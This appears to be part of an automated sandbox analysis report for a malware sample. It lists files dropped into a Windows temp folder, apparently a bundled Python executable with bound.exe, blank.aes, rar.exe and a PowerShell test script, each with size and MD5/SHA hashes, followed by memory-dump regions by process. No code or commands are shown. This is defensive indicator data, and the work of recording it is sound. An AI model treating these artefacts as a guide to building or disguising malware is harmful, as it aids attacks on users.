C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ctypes.pydFilesize
51KB
MD535001f868cbc1c3dcd337b1915356b09
SHA14b1c0e51ed920d29894739db618952632d6275aa
SHA2567753972db061b3fd543ec69ed478e05fe6d98e56960c3bdfaa101164a2508fbd
SHA512fa9628a69fc532b3805cca46d4cdbdb40ac4a8187d87fd469b522797368d588d16a2cb286c43544137849858444f71410deed90dde0cac5a34c9c55d69ddf1ac
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\_decimal.pydFilesize
77KB
MD5b6f3b12773dceb50350a472a52c67b74
SHA12b260ccc29d576bb3c7b6e845f1aec2df0028f81
SHA25665ddf0408964eaf41946abf0a28e75023e8a872595056b0d9cdb15c5addc71bf
SHA512bddb3927bb91a82c8d755b5f17e17d5ad8b56d6f24471fecc8ff37e09c12c6750f583a0199114539185fec17e46f49fe7c381c449bd799dacefdd4cbbbfc7750
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\_hashlib.pydFilesize
28KB
MD5368c589936dd438ab4ba01e699b2d057
SHA166a0a47a210279066d7d6906fc0502b6d0136ab7
SHA25635bb95a6c8dd259ccc7ee01ef2c5142d83a41c188bfc1a7d888e3b6988e8e3b7
SHA51261df0fbd6d668d1aae6555a0199bf6e1c28437d3a3e7bf190c4818908cbcb64d08d6d745b01a692cc2fea6ba101521223da2648f6438870249bd5f3ea5e549f4
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\_lzma.pydFilesize
78KB
MD5945c87e35009c0e335a5798d26a6bff5
SHA1d154e1dbe948ea34c49c598ecb1ba5046ce5701e
SHA25677e99912e32361e6af44676c841f1da7f028cd01886af6173bd25a8b6c97c748
SHA512130a0028828d4509bb014be3add814bc638851b8522e1b49c960689435978737b77d892f2aa35e830736f2ed0166dace753b5422a85e14c4a75310488c28748c
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\_queue.pydFilesize
23KB
MD5f43666bf65895bfbae75047bb1c6e3bc
SHA168bdbbc96c1e0fd742baf12e70cb3f7bcf3c36bd
SHA25699575c81cd208c47b6cc4c61624ac65c31b91ea957b68d5c3c82a6a6c37cfa70
SHA51290bbf0749498caec97ad754d844f3d6430aeac2a38e9f8a93ccc1bea4fdc71290a1496ba68d9932588ccad22fbf0d20a8df2a651ca310cfac81b632a04a0f271
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\_socket.pydFilesize
37KB
MD5c3f890e3039c68572f16de4bc34d6ca1
SHA1d6eb20ec639643a162715c3b631ae5edbd23fae2
SHA256bc28c36960b8028adc4fe2cc868df2b5c7778b4d4b0c7e15dd0b02a70ac1f5a2
SHA512ad95294e61391d245ddc4ed139d9765678bb5611f45808e3c985666b53da56f2afd4a46697d937ed1941d7ec64108dc4eaf39144041dc66a65626c7e9dfba90e
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\_sqlite3.pydFilesize
43KB
MD50a68f6c9a099a00a5ce26d1a3951dda9
SHA1b03bb0db3f5fe67450878ea141d68e77cad5e2aa
SHA256ec9d4b312ea445806b50e00f1e4467d4923386e2220af80aae2a759cf633954f
SHA512ad9dbeabae6fae3f302cae363b8591241adc443f5aade9ac950ebd8f705d4d168f6ef921bc433d45f6ac34055e83fbbbe0d51ee188605b11bda049d4db99fe47
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ssl.pydFilesize
56KB
MD592940dcc7b644481d182f58ec45623e7
SHA1374dbf370ee3a4659a600545ef4e4ba2b699dfea
SHA256b4d3b352a4aef999497738a30236f9d96e56b1fc92fd268c1736f74c902315f9
SHA5123ee1d32ff4caa89ea98b8def89b9c22b32199bb3cb0196add71975b260be898138d6a97db1ff2e7c6996dd0ddd03cbecdf32c83f381c1655bb8ad4ea8bb46569
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\base_library.zipFilesize
1.4MB
MD583d235e1f5b0ee5b0282b5ab7244f6c4
SHA1629a1ce71314d7abbce96674a1ddf9f38c4a5e9c
SHA256db389a9e14bfac6ee5cce17d41f9637d3ff8b702cc74102db8643e78659670a0
SHA51277364aff24cfc75ee32e50973b7d589b4a896d634305d965ecbc31a9e0097e270499dbec93126092eb11f3f1ad97692db6ca5927d3d02f3d053336d6267d7e5f
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\blank.aesFilesize
118KB
MD57b1b41206b5b4b4f182f044a3036306b
SHA19ff98ad41260b4157e822bb9d06194b8652676c8
SHA256041febaacd13992e55754900a3fa0a6a6e9e4a71c5cad600a893243d58e56af2
SHA512ab6af1cf948078c0883abaf49fe9fbce12887e5d26333ac811beb3de7d216a79ffd09a147bff382d9c70579ae558be773adc76b453d381b4758cea1afb745eda
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\bound.blankFilesize
839KB
MD5cf4fffa69f4ff17db11a7ee6f1a83cde
SHA1b2a76797b0b53e28120e90adc489045c09b53676
SHA256eafbe0db258e12897330cacaba4f73179c9768c1dcb0d1f6d6df2620cfa84958
SHA512d22835a8d04407365bbb49179f1f75e26dd42d0f3fad2b1a266a2c1d67e6606a535faec0e63222536f5891e00445cdacaf56f3a67a953bfc746738ad892d8c63
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\libcrypto-1_1.dllFilesize
753KB
MD5f05c8bbd35947b9019ef5f1d427cb07e
SHA18703df14305dc624a59808884d71e73877d509b4
SHA2562267f63a35fd3ff9599867a87fcb8123ea0e872a275f236a053ce8b1d13642d6
SHA512706058940f03e84045217cf99df0bf2a1e3cafd9ae61daa79acffa863b5403142859c1b66901d4a4deebec77b5e3c4674efa862f01211218f377d02a0a3aa19f
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\libffi-8.dllFilesize
23KB
MD5df5514796b647481d295b14a43f5287f
SHA1cf52bf55d81d98c46142117fb82d2a9dc7da1b41
SHA2561e1f2e32114e5c20b1b804c92618318e7a1a7524162a73155e5e1653d08f7b77
SHA512379d4db1952f9c3a21192e27d98fd9635b66bd928e448c8725d4d9ef479099674863055703b45ac4aefd9ae478994b69948c87b558db092944d1d636e146016a
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\libssl-1_1.dllFilesize
171KB
MD5f3d3487191db4bbecc0a775cde827cc1
SHA143fef4f4de1185d7ca4dd5e8fa018a57e87b3d31
SHA25622a0c62fd88787fd64845a9522747f5d960fb3b53b47272b75b96c67524ee222
SHA51201c957c17d0e37203294b2a7d9fb75fee00e9c854e9b98d847befc5e7bcd9b6e053207fd9b41796e76e95b691324e2545300d1b8434a7da9207998f39b5295cd
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\python311.dllFilesize
1.4MB
MD50e06f85bcfb1c684469ce62e35b5c272
SHA173122369425c1fec9a035975a1834139f6869279
SHA2566209e55cae73ab3d7bb19a80cd4fb9981b6a3db75bcd5036e84084b23956d9f8
SHA512c4077f23bf2bc1b2826ad85b4955419b4f79c1bba144372e6706ee8e07ea252d820fdb8c43a6fdd4020fa1e468aff287df443a42b2fdcbd9f41d56f5bbe83b4f
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\rar.exeFilesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\rarreg.keyFilesize
456B
MD54531984cad7dacf24c086830068c4abe
SHA1fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA25658209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA51200056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\select.pydFilesize
23KB
MD51ecea4488c6503337c5fd9d50c8fb638
SHA131c61c788dab5dc58ff479af7eff758a0229253c
SHA256f20251e6571c43f4ecbbe00e72637f91605886dd76c77557edf7979f71c07d0e
SHA512c7011d4d67cef3e4a7b1e096dfc0633fcedc4f287676039833c89966995b673c6fb8456e595ba49260dbc7b9bda523256344c4814fa2f8bd10af290861a3b8b6
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\sqlite3.dllFilesize
496KB
MD5fdbc1adfdeb07195f85bf551cf03a0de
SHA194dcf3ec50759ee92335f02fc0f3d9e60305e740
SHA256563d0bc6b5a401f2c66f67ccaa19c50084b67433ec440bb9cf0a8d81ee269c55
SHA512bd567a4c6b4627556b02f4299d1b8a9aa7affae0aafbe5a10c92c7e5a08e7f8cbda497f27c01d1ff4352ff1dc1c2fe3c79ff9484e58e6357c96c9a064f5011ea
-
C:\Users\Admin\AppData\Local\Temp\_MEI39962\unicodedata.pydFilesize
291KB
MD5bb3d050b8a75f478e4b29897eae427b0
SHA11930808a59a8fd9c57ed6039e7614697b4cb03d9
SHA25606af11548b8a58fed50ae7dbe2fcfbbf04b890926e0fffd70eed02aecc0d97c6
SHA512be596e2829c6978d7f138f79059172024ee73cd3e1f3d7a24aaca4b0d85a2302e2060e6cebd54854e7f08ed66b665429d38bb22c512dd82533d8ba87a426f515
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgoleqnr.jz5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\bound.exeFilesize
1.4MB
MD585091f0dca9adc1bc302eba94fd1398d
SHA136d336b4c6ba61112e4f98a8af96605d9a49afbe
SHA2563b1aa1f5485cd77a5a736b336ed189ac4e837a699acd36fc415c2bc7cb4748de
SHA5120a98f92a9b1c0e57bd7a4526895a1a0177a3a4783c6b5ee9beee09e3de7b30c97210336e7fca115ed39af7626446b22db7511b508a4280f45b077286225f7888
-
memory/908-188-0x00007FF6075E0000-0x00007FF607754000-memory.dmpFilesize
1.5MB
-
memory/908-87-0x00007FF6075E0000-0x00007FF607754000-memory.dmpFilesize
1.5MB
-
memory/2396-230-0x0000000007DF0000-0x0000000007E01000-memory.dmpFilesize
68KB
-
memory/2396-231-0x0000000007E40000-0x0000000007E54000-memory.dmpFilesize
80KB
-
memory/2396-216-0x0000000006340000-0x0000000006694000-memory.dmpFilesize
3.3MB
-
memory/2396-218-0x0000000006910000-0x000000000695C000-memory.dmpFilesize
304KB
-
memory/2396-219-0x0000000070370000-0x00000000703BC000-memory.dmpFilesize
304KB
-
memory/2396-229-0x0000000007B50000-0x0000000007BF3000-memory.dmpFilesize
652KB
-
memory/3308-56-0x00000000755C0000-0x00000000755E7000-memory.dmpFilesize
156KB
-
memory/3308-73-0x00000000750A0000-0x00000000752FA000-memory.dmpFilesize
2.4MB
-
memory/3308-79-0x0000000075600000-0x000000007561F000-memory.dmpFilesize
124KB
-
memory/3308-76-0x0000000075650000-0x0000000075B5B000-memory.dmpFilesize
5.0MB
-
memory/3308-83-0x00000000755F0000-0x00000000755FD000-memory.dmpFilesize
52KB
-
memory/3308-84-0x0000000074EF0000-0x0000000075009000-memory.dmpFilesize
1.1MB
-
memory/3308-66-0x00000000753D0000-0x00000000753DC000-memory.dmpFilesize
48KB
-
memory/3308-62-0x0000000075440000-0x0000000075577000-memory.dmpFilesize
1.2MB
-
memory/3308-60-0x0000000075580000-0x000000007559B000-memory.dmpFilesize
108KB
-
memory/3308-248-0x0000000075650000-0x0000000075B5B000-memory.dmpFilesize
5.0MB
-
memory/3308-233-0x0000000075650000-0x0000000075B5B000-memory.dmpFilesize
5.0MB
-
memory/3308-77-0x0000000075030000-0x0000000075040000-memory.dmpFilesize
64KB
-
memory/3308-58-0x00000000755A0000-0x00000000755B8000-memory.dmpFilesize
96KB
-
memory/3308-65-0x0000000075420000-0x0000000075436000-memory.dmpFilesize
88KB
-
memory/3308-72-0x0000000075300000-0x0000000075394000-memory.dmpFilesize
592KB
-
memory/3308-80-0x0000000075020000-0x000000007502C000-memory.dmpFilesize
48KB
-
memory/3308-74-0x0000000003D30000-0x0000000003F8A000-memory.dmpFilesize
2.4MB
-
memory/3308-68-0x00000000753A0000-0x00000000753C8000-memory.dmpFilesize
160KB
-
memory/3308-190-0x0000000075650000-0x0000000075B5B000-memory.dmpFilesize
5.0MB
-
memory/3308-189-0x0000000003D30000-0x0000000003F8A000-memory.dmpFilesize
2.4MB
-
memory/3308-33-0x00000000755F0000-0x00000000755FD000-memory.dmpFilesize
52KB
-
memory/3308-173-0x0000000075600000-0x000000007561F000-memory.dmpFilesize
124KB
-
memory/3308-179-0x0000000075420000-0x0000000075436000-memory.dmpFilesize
88KB
-
memory/3308-181-0x00000000753A0000-0x00000000753C8000-memory.dmpFilesize
160KB
-
memory/3308-182-0x0000000075300000-0x0000000075394000-memory.dmpFilesize
592KB
-
memory/3308-183-0x00000000750A0000-0x00000000752FA000-memory.dmpFilesize
2.4MB
-
memory/3308-186-0x0000000074EF0000-0x0000000075009000-memory.dmpFilesize
1.1MB
-
memory/3308-187-0x0000000075440000-0x0000000075577000-memory.dmpFilesize
1.2MB
-
memory/3308-172-0x0000000075650000-0x0000000075B5B000-memory.dmpFilesize
5.0MB
-
memory/3308-171-0x0000000075580000-0x000000007559B000-memory.dmpFilesize
108KB
-
memory/3308-30-0x0000000075600000-0x000000007561F000-memory.dmpFilesize
124KB
-
memory/3308-26-0x0000000075650000-0x0000000075B5B000-memory.dmpFilesize
5.0MB
-
memory/3708-164-0x0000000007C00000-0x0000000007C1A000-memory.dmpFilesize
104KB
-
memory/3708-161-0x0000000007AC0000-0x0000000007AD1000-memory.dmpFilesize
68KB
-
memory/3708-91-0x00000000055F0000-0x0000000005612000-memory.dmpFilesize
136KB
-
memory/3708-147-0x000000006FFA0000-0x000000006FFEC000-memory.dmpFilesize
304KB
-
memory/4784-124-0x00000000062D0000-0x0000000006302000-memory.dmpFilesize
200KB
-
memory/4784-135-0x000000006FFA0000-0x000000006FFEC000-memory.dmpFilesize
304KB
-
memory/4784-159-0x00000000070B0000-0x00000000070BA000-memory.dmpFilesize
40KB
-
memory/4784-90-0x0000000004FC0000-0x00000000055E8000-memory.dmpFilesize
6.2MB
-
memory/4784-163-0x0000000007280000-0x0000000007294000-memory.dmpFilesize
80KB
-
memory/4784-162-0x0000000007270000-0x000000000727E000-memory.dmpFilesize
56KB
-
memory/4784-146-0x0000000006EE0000-0x0000000006F83000-memory.dmpFilesize
652KB
-
memory/4784-122-0x0000000005CF0000-0x0000000005D0E000-memory.dmpFilesize
120KB
-
memory/4784-123-0x0000000005D20000-0x0000000005D6C000-memory.dmpFilesize
304KB
-
memory/4784-160-0x00000000072C0000-0x0000000007356000-memory.dmpFilesize
600KB
-
memory/4932-125-0x000000006FFA0000-0x000000006FFEC000-memory.dmpFilesize
304KB
-
memory/4932-145-0x0000000006640000-0x000000000665E000-memory.dmpFilesize
120KB
-
memory/4932-165-0x00000000076F0000-0x00000000076F8000-memory.dmpFilesize
32KB
-
memory/4932-103-0x0000000005BC0000-0x0000000005F14000-memory.dmpFilesize
3.3MB
-
memory/4932-157-0x0000000007A20000-0x000000000809A000-memory.dmpFilesize
6.5MB
-
memory/4932-92-0x0000000005320000-0x0000000005386000-memory.dmpFilesize
408KB
-
memory/4932-93-0x0000000005390000-0x00000000053F6000-memory.dmpFilesize
408KB
-
memory/4932-158-0x00000000073D0000-0x00000000073EA000-memory.dmpFilesize
104KB
-
memory/4932-89-0x0000000002840000-0x0000000002876000-memory.dmpFilesize
216KB